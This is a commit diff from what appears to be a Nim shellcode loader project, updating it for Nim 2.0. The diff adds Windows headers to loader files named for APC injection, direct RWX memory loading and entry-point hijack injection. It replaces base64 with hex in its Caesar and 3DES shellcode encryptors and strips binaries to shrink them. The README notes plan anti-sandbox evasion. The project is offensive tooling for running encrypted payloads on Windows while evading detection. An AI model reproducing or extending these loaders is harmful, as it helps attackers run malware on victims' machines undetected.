支持nim2.0版本

Author: aeverj

.gitignore

@@ -0,0 +1,10 @@
+# Created by https://www.toptal.com/developers/gitignore/api/nim
+# Edit at https://www.toptal.com/developers/gitignore?templates=nim
+
+### Nim ###
+nimcache/
+nimblecache/
+htmldocs/
+.idea/
+*.exe
+# End of https://www.toptal.com/developers/gitignore/api/nim

APC_Ijnect_Load.nim

@@ -1,6 +1,7 @@
 import public
 
 {.emit: """
+#include <windows.h>
 #include <vector>
 #include <TlHelp32.h>
 

Direct_Load.nim

@@ -1,6 +1,11 @@
 import public
 
 {.emit: """
+#include <windows.h>
+#include <iostream>
+#include <iomanip>
+
+
 int Direct_Load(char *shellcode,SIZE_T shellcodeSize)
 {
   LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

OEP_Hiijack_Inject_Load.nim

@@ -2,7 +2,8 @@
 import public
 
 {.emit: """
-#include<winternl.h>
+#include <windows.h>
+#include <winternl.h>
 
 int OEP(char *shellcode,SIZE_T shellcodeSize)
 {

README.md

@@ -4,6 +4,8 @@
 ![codeloader](pic/codeloader.png)
 ## 更新：
 
+**20230826：支持nim的v2.0版本，去除base64编码，减小文件生成体积**
+
 **20220620：Fix Bug！增加2种加载`shellcode`方式**
 
 **20220203：Fix Bug！增加14种加载`shellcode`方式，nim version>=1.6.2**
@@ -31,12 +33,15 @@
 ## 安装：
 
 **1、安装`nim`最新版**
+ - 从[下载页面](https://nim-lang.org/install_windows.html)，分别下载nim的安装包和编译器mingw64，将两者解压到任意目录，分别将两个文件夹里面的bin文件夹路径添加到path环境变量中
+ - 打开命令行，输入nim回车，输入gcc或g++回车，返回正常即可之后正常使用nim来编译程序
+ - 需要安装[winim](https://github.com/khchen/winim)
 
 **2、下载本项目，分别编译`encryption`中的`Tdea.nim`和`Caesar.nim`。**
 
-`nim c -d:release --opt:size Tdea.nim`
+`nim c -d:release -d:strip --opt:size Tdea.nim`
 
-`nim c -d:release --opt:size Caesar.nim`
+`nim c -d:release -d:strip --opt:size Caesar.nim`
 
 **3、编译c#项目，将可执行文件放到当前目录**
 
@@ -80,8 +85,10 @@ https://github.com/S4R1N/AlternativeShellcodeExec
 
 ## TODO：
 
-- 增加更多的加载方式
+- [ ] 添加图标自定义功能
+
+- [ ] 增加更多的加载方式
 
-- 增加反沙箱等功能
+- [ ] 增加反沙箱等功能
 
-- 增加加密方式
+- [ ] 增加加密方式

encryption/Caesar.nim

@@ -1,6 +1,11 @@
+#[
+    compile this with following nim command:
+        nim c -d:release -d:strip --opt:size Caesar.nim
+]#
+
 import sequtils
 import random,os
-import base64
+import strutils
 
 var dict = toSeq(0..255).mapIt(it.uint8)
 randomize()
@@ -12,5 +17,6 @@ for i in 0..high(entireFile):
     for k in 0..high(dict):
         if entireFile[i] == dict[k]:
             finallTable[i] = k.uint8
-let result = encode(concat(dict,finallTable))
-echo result
+for i in concat(dict,finallTable):
+    stdout.write i.uint8.toHex
+stdout.flushFile()

encryption/Tdea.nim

@@ -1,21 +1,28 @@
 {.compile: "des.c".}
 proc D3DES_Encrypt(plainBuffer:cstring,keyBuffer:cstring,cipherBuffer:cstring,n:cint):cint {.importc,cdecl.}
+#[
+    compile this with following nim command:
+        nim c -d:release -d:strip --opt:size Tdea.nim
+]#
 
-import random,sequtils,os,base64
+import random,sequtils,os
+import strutils
 
 randomize()
-var key:cstring
+var key:string
 for i in 0..23:
-    key = $key & (rand(254)+1).char
+    key.add((rand(254)+1).char)
 let entireFile = cast[string](readFile(paramStr(1)))
 let plainBuffer :cstring = entireFile
 let out_len = ((entireFile.len / 8 + 1).int*8)
 var cipherBuffer = cast[cstring](alloc0(out_len))
-discard D3DES_Encrypt(plainBuffer,key,cipherBuffer,cast[cint](entireFile.len))
+discard D3DES_Encrypt(plainBuffer,key.string,cipherBuffer,cast[cint](entireFile.len))
 
 
-let plain_len_byte = cast[array[2,byte]](entireFile.len)
+let plain_len_byte = cast[array[4,byte]](entireFile.len)
 var result = newSeq[byte]()
 for index in 0..(out_len-1):
     result.add(cipherBuffer[index].byte)
-echo encode(concat(@plain_len_byte,key.mapIt(it.byte),result))
+for i in concat(@plain_len_byte,key.mapIt(it.byte),result):
+    stdout.write i.uint8.toHex
+stdout.flushFile()

public.nim

@@ -1,8 +1,7 @@
 {.passL:"-static"}
 # {.hint[XDeclaredButNotUsed]:off.}
 # {.passL:"-D:_WIN32_WINNT=0x0602"}
-{.compile: "encryption\\des.c".}
-import base64
+import strutils
 
 const source {.strdefine.}: string = ""
 var code*:cstring
@@ -12,7 +11,7 @@ const currsource:string = "\"" & source & "\""
 when defined(Caesar):
     import sequtils
     proc caesar(result:string): void =
-        let decodres = decode(result)
+        let decodres = parseHexStr(result)
         let dic = decodres[0..255].mapIt(it.byte)
         let table = decodres[256..high(decodres)].mapIt(it.byte)
         var deshellcode = newSeq[uint8](table.len)
@@ -27,14 +26,15 @@ when defined(Caesar):
     caesar(enbase64)
 
 elif defined(TDEA):
+    {.compile: "encryption\\des.c".}
     proc D3DES_Decrypt(plainBuffer:cstring,keyBuffer:cstring,cipherBuffer:cstring,n:cint):cint {.importc,cdecl.}
     proc de3des(enbase64:string): void =
-        let shellcode:string = decode(enbase64) 
-        let plain_len_byte = cast[int16]([shellcode[0],shellcode[1]])
-        let input_encode:cstring = cstring(shellcode[26..high(shellcode)])
-        let key:cstring = cstring(shellcode[2..25])
+        let shellcode:string = parseHexStr(enbase64)
+        let plain_len_byte = cast[uint32]([shellcode[0],shellcode[1],shellcode[2],shellcode[3]])
+        let input_encode:cstring = cstring(shellcode[28..high(shellcode)])
+        let key:cstring = cstring(shellcode[4..27])
         code = cast[cstring](alloc0(plain_len_byte));
         discard D3DES_Decrypt(input_encode,key,code,cast[cint](plain_len_byte))
-        codelen = plain_len_byte
+        codelen = cast[cint](plain_len_byte)
     const enbase64 = staticExec("encryption\\Tdea.exe " & currsource)
     de3des(enbase64)